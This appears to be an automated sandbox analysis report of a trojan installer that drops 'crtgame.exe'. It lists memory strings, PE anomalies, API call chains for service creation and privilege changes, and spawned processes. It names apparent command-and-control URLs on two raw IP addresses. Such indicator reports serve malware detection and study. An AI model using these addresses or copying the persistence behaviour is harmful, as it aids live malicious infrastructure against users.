Source: crtgame.exe, 00000007.00000002.3367201054.0000000000780000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3369579330.0000000003597000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde
Source: crtgame.exe, 00000007.00000002.3367201054.0000000000780000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3369579330.0000000003590000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3367201054.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb386b7b3202f04330aa1905c311578eaae3c7edb62dde2
Source: is-PTERI.tmp.1.dr	String found in binary or memory: http://LosslessAudio.org/0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-9BPJ8.tmp.1.dr	String found in binary or memory: http://code.google.com/p/mp4v2D
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-A2FB0.tmp.1.dr	String found in binary or memory: http://lame.sf.net
Source: is-A2FB0.tmp.1.dr	String found in binary or memory: http://lame.sf.net32bits
Source: is-PV0J3.tmp.1.dr	String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: is-3DI9V.tmp.1.dr, is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://ocsps.ssl.com0Q
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: wG1fFAzGfH.tmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: is-A2FB0.tmp.1.dr	String found in binary or memory: http://www.mp3dev.org/
Source: is-A2FB0.tmp.1.dr	String found in binary or memory: http://www.mp3dev.org/ID3Error
Source: is-JM3DF.tmp.1.dr	String found in binary or memory: http://www.mpg123.de
Source: wG1fFAzGfH.exe, 00000000.00000003.2122176346.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.exe, 00000000.00000003.2122004252.0000000002350000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.tmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: wG1fFAzGfH.exe, 00000000.00000003.2122176346.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.exe, 00000000.00000003.2122004252.0000000002350000.00000004.00001000.00020000.00000000.sdmp, wG1fFAzGfH.tmp, 00000001.00000000.2122667154.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-3QRHG.tmp.1.dr, wG1fFAzGfH.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/psU
Source: is-40RRA.tmp.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: is-B7IAM.tmp.1.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: is-9BPJ8.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn
Source: is-9BPJ8.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
Source: is-9BPJ8.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
Source: is-9BPJ8.tmp.1.dr	String found in binary or memory: https://mp4v2.googlecode.com/svnrepository
Source: is-3DI9V.tmp.1.dr, is-P220F.tmp.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: is-LPFO4.tmp.1.dr	String found in binary or memory: https://streams.videolan.org/upload/
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: is-J1FBL.tmp.1.dr, is-LOMUV.tmp.1.dr	String found in binary or memory: https://www.ssl.com/repository0

System Summary

PE file has nameless sections

Source: is-FQCKS.tmp.1.dr	Static PE information: section name:
Source: is-FQCKS.tmp.1.dr	Static PE information: section name:
Source: is-8HTIS.tmp.1.dr	Static PE information: section name:
Source: is-8HTIS.tmp.1.dr	Static PE information: section name:
Source: is-RPVR0.tmp.1.dr	Static PE information: section name:
Source: is-RPVR0.tmp.1.dr	Static PE information: section name:
Source: is-LOMUV.tmp.1.dr	Static PE information: section name:
Source: is-J5DR2.tmp.1.dr	Static PE information: section name:
Source: is-J5DR2.tmp.1.dr	Static PE information: section name:
Source: is-VKOGP.tmp.1.dr	Static PE information: section name:
Source: is-VKOGP.tmp.1.dr	Static PE information: section name:
Source: is-J1FBL.tmp.1.dr	Static PE information: section name:
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-V5C1L.tmp.1.dr	Static PE information: section name:
Source: is-V5C1L.tmp.1.dr	Static PE information: section name:
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-JKH63.tmp.1.dr	Static PE information: section name:
Source: is-JKH63.tmp.1.dr	Static PE information: section name:
Source: is-IQEKE.tmp.1.dr	Static PE information: section name:
Source: is-IQEKE.tmp.1.dr	Static PE information: section name:
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-DDN59.tmp.1.dr	Static PE information: section name:
Source: is-DDN59.tmp.1.dr	Static PE information: section name:
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0042F394 NtdllDefWindowProc_A,	1_2_0042F394
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00423B94 NtdllDefWindowProc_A,	1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004125E8 NtdllDefWindowProc_A,	1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_0045678C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00477568 NtdllDefWindowProc_A,	1_2_00477568

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E7A8

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454B00

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_0040840C	0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00466ABC	1_2_00466ABC
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0047EFD8	1_2_0047EFD8
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0043D5A4	1_2_0043D5A4
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0046F68C	1_2_0046F68C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0048C110	1_2_0048C110
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004301D0	1_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004442C4	1_2_004442C4
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045E7EC	1_2_0045E7EC
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045A894	1_2_0045A894
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004449BC	1_2_004449BC
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00468B44	1_2_00468B44
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00434B1C	1_2_00434B1C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00430D5C	1_2_00430D5C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00444DC8	1_2_00444DC8
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00484ED4	1_2_00484ED4
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045101C	1_2_0045101C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00443D1C	1_2_00443D1C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00485E08	1_2_00485E08
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00433E18	1_2_00433E18
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_03101EE0	1_2_03101EE0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_03101140	1_2_03101140
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_031016B0	1_2_031016B0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 5_2_00401051	5_2_00401051
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 5_2_00401CBD	5_2_00401CBD
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C35F2A	7_2_02C35F2A
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C3EA19	7_2_02C3EA19
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C4E085	7_2_02C4E085
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C528A4	7_2_02C528A4
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C49964	7_2_02C49964
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C54919	7_2_02C54919
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C54E90	7_2_02C54E90
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C35EB7	7_2_02C35EB7
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C4D779	7_2_02C4D779
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C4A71A	7_2_02C4A71A
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C47F22	7_2_02C47F22
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C4DC6D	7_2_02C4DC6D
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C6BFDE	7_2_02C6BFDE
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: 7_2_02C6BFD9	7_2_02C6BFD9

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: String function: 02C485C0 appears 37 times
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: String function: 02C54E20 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00457114 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00403684 appears 218 times
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: String function: 00456F08 appears 91 times

Source: wG1fFAzGfH.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wG1fFAzGfH.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: wG1fFAzGfH.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: wG1fFAzGfH.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: wG1fFAzGfH.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: crtgame.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-3QRHG.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-3QRHG.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-3QRHG.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-3QRHG.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: TAudioClass.exe.5.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: is-GV5KO.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-2AGLA.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-TO8AC.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-J36DT.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-LPFO4.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-PV0J3.tmp.1.dr	Static PE information: Number of sections : 11 > 10
Source: is-40RRA.tmp.1.dr	Static PE information: Number of sections : 18 > 10

Source: wG1fFAzGfH.exe, 00000000.00000003.2122176346.00000000020E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs wG1fFAzGfH.exe
Source: wG1fFAzGfH.exe, 00000000.00000003.2122004252.0000000002350000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs wG1fFAzGfH.exe

Source: wG1fFAzGfH.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: crtgame.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TAudioClass.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-FQCKS.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9964533211297071
Source: is-VKOGP.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9976058467741935
Source: is-GNGP9.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.995148689516129
Source: is-V5C1L.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9908203125
Source: is-IQEKE.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9903624487704918
Source: is-0T8SC.tmp.1.dr	Static PE information: Section: ZLIB complexity 0.9891526442307692

Source: is-P220F.tmp.1.dr

Binary or memory string: ?..la..dll.Unknown error %u occurred.sln

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/128@7/3

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 7_2_02C402E0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,

7_2_02C402E0

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455328

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

5_2_00402548

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0046D118 GetVersion,CoCreateInstance,

1_2_0046D118

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409BEC

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,

5_2_004026F0

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

5_2_004026F0

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

File created: C:\Program Files (x86)\CRTGame

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Mutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

File created: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: is-40RRA.tmp.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: is-40RRA.tmp.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: is-40RRA.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: is-40RRA.tmp.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: is-40RRA.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: is-40RRA.tmp.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: is-40RRA.tmp.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: is-40RRA.tmp.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: is-40RRA.tmp.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

Source: wG1fFAzGfH.exe	Virustotal: Detection: 57%
Source: wG1fFAzGfH.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe

File read: C:\Users\user\Desktop\wG1fFAzGfH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wG1fFAzGfH.exe "C:\Users\user\Desktop\wG1fFAzGfH.exe"
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp "C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp" /SL5="$103C0,6985375,54272,C:\Users\user\Desktop\wG1fFAzGfH.exe"
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
